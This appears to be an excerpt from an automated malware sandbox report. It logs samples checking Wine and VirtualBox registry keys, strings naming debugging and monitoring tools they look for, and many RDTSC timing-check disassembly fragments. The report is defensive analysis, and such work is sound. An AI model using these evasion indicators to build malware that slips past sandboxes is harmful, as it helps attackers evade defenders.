Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 382cd038a3.exe, 00000010.00000003.2214419534.0000000007614000.00000004.00001000.00020000.00000000.sdmp, 382cd038a3.exe, 00000010.00000002.2349258270.0000000000DA5000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: PROCMON.EXE
Source: 382cd038a3.exe, 00000010.00000003.2214419534.0000000007614000.00000004.00001000.00020000.00000000.sdmp, 382cd038a3.exe, 00000010.00000002.2349258270.0000000000DA5000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: X64DBG.EXE
Source: 382cd038a3.exe, 00000010.00000003.2214419534.0000000007614000.00000004.00001000.00020000.00000000.sdmp, 382cd038a3.exe, 00000010.00000002.2349258270.0000000000DA5000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: WINDBG.EXE
Source: 382cd038a3.exe, 00000010.00000002.2349258270.0000000000DA5000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 382cd038a3.exe, 00000010.00000003.2214419534.0000000007614000.00000004.00001000.00020000.00000000.sdmp, 382cd038a3.exe, 00000010.00000002.2349258270.0000000000DA5000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: ACF2EE second address: ACEB87 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF724EF3098h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d stc 0x0000000e push dword ptr [ebp+122D10C5h] 0x00000014 pushad 0x00000015 mov edi, ebx 0x00000017 popad 0x00000018 call dword ptr [ebp+122D2085h] 0x0000001e pushad 0x0000001f mov dword ptr [ebp+122D2ACBh], edi 0x00000025 xor eax, eax 0x00000027 jmp 00007FF724EF309Ah 0x0000002c mov edx, dword ptr [esp+28h] 0x00000030 pushad 0x00000031 jne 00007FF724EF3097h 0x00000037 stc 0x00000038 sbb al, 0000002Fh 0x0000003b popad 0x0000003c mov dword ptr [ebp+122D385Eh], eax 0x00000042 sub dword ptr [ebp+122D2ACBh], eax 0x00000048 mov esi, 0000003Ch 0x0000004d stc 0x0000004e pushad 0x0000004f mov esi, dword ptr [ebp+122D37CAh] 0x00000055 mov bx, 90B1h 0x00000059 popad 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e jp 00007FF724EF309Ch 0x00000064 lodsw 0x00000066 stc 0x00000067 add eax, dword ptr [esp+24h] 0x0000006b pushad 0x0000006c or si, 8203h 0x00000071 mov ecx, 213B4807h 0x00000076 popad 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b jmp 00007FF724EF30A7h 0x00000080 push eax 0x00000081 pushad 0x00000082 pushad 0x00000083 pushad 0x00000084 popad 0x00000085 push eax 0x00000086 push edx 0x00000087 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: ACEB87 second address: ACEB90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C4D62A second address: C4D63A instructions: 0x00000000 rdtsc 0x00000002 js 00007FF724EF309Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C4D63A second address: C4D648 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E9654Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C4D8C6 second address: C4D8D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF309Ch 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C4D8D8 second address: C4D8DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C4DECB second address: C4DEDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 jg 00007FF724EF309Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C4DEDA second address: C4DEE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C50053 second address: C50069 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF30A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C50069 second address: C50115 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E96556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 744EF487h 0x00000010 mov dword ptr [ebp+122D290Bh], ebx 0x00000016 push 00000003h 0x00000018 push 00000000h 0x0000001a and ecx, 2F66E96Bh 0x00000020 push 00000003h 0x00000022 jno 00007FF724E96548h 0x00000028 jmp 00007FF724E96550h 0x0000002d push 86D5A8E1h 0x00000032 jns 00007FF724E9654Eh 0x00000038 add dword ptr [esp], 392A571Fh 0x0000003f mov dword ptr [ebp+122D2410h], edi 0x00000045 lea ebx, dword ptr [ebp+12454EF3h] 0x0000004b or dh, FFFFFF83h 0x0000004e sub cl, 00000005h 0x00000051 xchg eax, ebx 0x00000052 jnc 00007FF724E96567h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c push edi 0x0000005d pop edi 0x0000005e jne 00007FF724E96546h 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C50115 second address: C5011B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C5011B second address: C5011F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C5011F second address: C50123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C5019C second address: C501A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FF724E96546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C501A6 second address: C501AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C501AA second address: C501BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c jp 00007FF724E96546h 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C501BD second address: C501C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C501C3 second address: C50239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007FF724E96548h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 sub dword ptr [ebp+122D1E0Dh], edi 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007FF724E96548h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 xor dword ptr [ebp+122D1E0Dh], edx 0x0000004b call 00007FF724E96549h 0x00000050 push eax 0x00000051 push edx 0x00000052 push ecx 0x00000053 jmp 00007FF724E96551h 0x00000058 pop ecx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C50239 second address: C5027C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF724EF309Ch 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c js 00007FF724EF30A2h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF724EF30A8h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C5027C second address: C50282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C50282 second address: C50311 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF30A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d jng 00007FF724EF30AEh 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push esi 0x00000018 jns 00007FF724EF30A3h 0x0000001e jmp 00007FF724EF309Dh 0x00000023 pop esi 0x00000024 pop eax 0x00000025 mov di, ED7Ch 0x00000029 push 00000003h 0x0000002b mov dword ptr [ebp+122D3655h], esi 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007FF724EF3098h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000018h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d mov esi, dword ptr [ebp+122D391Eh] 0x00000053 push 00000003h 0x00000055 push 7BED42DBh 0x0000005a pushad 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C50311 second address: C5031E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jc 00007FF724E9654Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C5031E second address: C50362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 4412BD25h 0x0000000c jnp 00007FF724EF309Ch 0x00000012 mov dword ptr [ebp+122D22D2h], edx 0x00000018 lea ebx, dword ptr [ebp+12454EFCh] 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007FF724EF3098h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 00000017h 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b push ebx 0x0000003c pushad 0x0000003d popad 0x0000003e pop ebx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C503C5 second address: C503CF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C503CF second address: C503D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C503D3 second address: C503E3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF724E96546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C503E3 second address: C50458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 nop 0x00000009 or dword ptr [ebp+122D28ABh], esi 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FF724EF3098h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b call 00007FF724EF3099h 0x00000030 jmp 00007FF724EF30A4h 0x00000035 push eax 0x00000036 push esi 0x00000037 pushad 0x00000038 push eax 0x00000039 pop eax 0x0000003a jmp 00007FF724EF309Fh 0x0000003f popad 0x00000040 pop esi 0x00000041 mov eax, dword ptr [esp+04h] 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FF724EF309Ah 0x0000004c rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C50458 second address: C50462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FF724E96546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C50462 second address: C504FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF30A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d jg 00007FF724EF30A4h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 jmp 00007FF724EF30A6h 0x0000001c pop eax 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007FF724EF3098h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 0000001Dh 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 push 00000003h 0x00000039 add edi, dword ptr [ebp+122D37FEh] 0x0000003f push 00000000h 0x00000041 jng 00007FF724EF3097h 0x00000047 clc 0x00000048 mov esi, ecx 0x0000004a push 00000003h 0x0000004c movzx edi, cx 0x0000004f call 00007FF724EF3099h 0x00000054 push eax 0x00000055 push edx 0x00000056 ja 00007FF724EF309Ch 0x0000005c rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C504FE second address: C50511 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c jnl 00007FF724E96546h 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C6FB57 second address: C6FB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C6FB5E second address: C6FB64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C6FB64 second address: C6FB77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF724EF309Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7036E second address: C70374 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C70374 second address: C70378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C70378 second address: C703BC instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF724E96546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FF724E96556h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jns 00007FF724E96567h 0x00000018 jmp 00007FF724E96559h 0x0000001d push esi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C70677 second address: C70697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push ecx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007FF724EF309Ah 0x00000011 pop ecx 0x00000012 pushad 0x00000013 jns 00007FF724EF3096h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C662CC second address: C662D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C662D2 second address: C662EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF724EF30A6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7101C second address: C7104B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E96550h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007FF724E96557h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7104B second address: C7104F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7146C second address: C71470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C71470 second address: C714A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF30A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007FF724EF30A6h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C71736 second address: C7174C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF724E96546h 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FF724E9655Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7174C second address: C71762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF724EF30A2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C71762 second address: C7176D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FF724E96546h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7176D second address: C71775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C71775 second address: C7177B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7177B second address: C71781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C743CF second address: C743D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C787C1 second address: C787CB instructions: 0x00000000 rdtsc 0x00000002 je 00007FF724EF309Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C787CB second address: C787D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C787D6 second address: C7880E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF724EF30A8h 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jng 00007FF724EF3096h 0x0000001e jnp 00007FF724EF3096h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7880E second address: C78813 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C78813 second address: C78833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FF724EF309Dh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C78833 second address: C78837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C78837 second address: C7883B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7883B second address: C78841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C78841 second address: C7885C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF724EF30A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C789AE second address: C789C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FF724E9654Ch 0x0000000f jne 00007FF724E96546h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C789C3 second address: C789CD instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF724EF309Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C2EF15 second address: C2EF1F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF724E96546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7CFB2 second address: C7CFB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7D27D second address: C7D283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
